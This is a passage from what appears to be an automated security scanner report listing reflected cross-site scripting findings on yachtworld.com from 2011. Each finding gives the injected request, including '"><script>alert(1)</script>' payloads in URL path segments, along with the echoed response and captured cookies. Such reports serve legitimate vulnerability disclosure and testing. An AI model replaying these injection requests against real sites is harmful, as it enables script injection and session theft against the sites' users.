Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:38 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type57636"><a>487ec78469f/Hunter/1">
...[SNIP]...

3.249. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hunter/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1afe"><a>5bf634ff1b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Hunterf1afe"><a>5bf634ff1b3/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:47 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Hunterf1afe"><a>5bf634ff1b3/A-1">
...[SNIP]...

3.250. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hunter/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b6e"><script>alert(1)</script>407238705d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Hunter/137b6e"><script>alert(1)</script>407238705d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Hunter/137b6e"><script>alert(1)</script>407238705d/A-1">
...[SNIP]...

3.251. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Island+Packett/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 734e4"><script>alert(1)</script>6136c038ce4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type734e4"><script>alert(1)</script>6136c038ce4/Island+Packett/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:52 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type734e4"><script>alert(1)</script>6136c038ce4/260+Cruiser">
...[SNIP]...

3.252. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Island+Packett/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517c7"><a>95f5baca051 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Island+Packett517c7"><a>95f5baca051/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:55 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Island+Packett517c7"><a>95f5baca051/A-1">
...[SNIP]...

3.253. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Luhrs/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198b2"><a>c472289651c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type198b2"><a>c472289651c/Luhrs/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
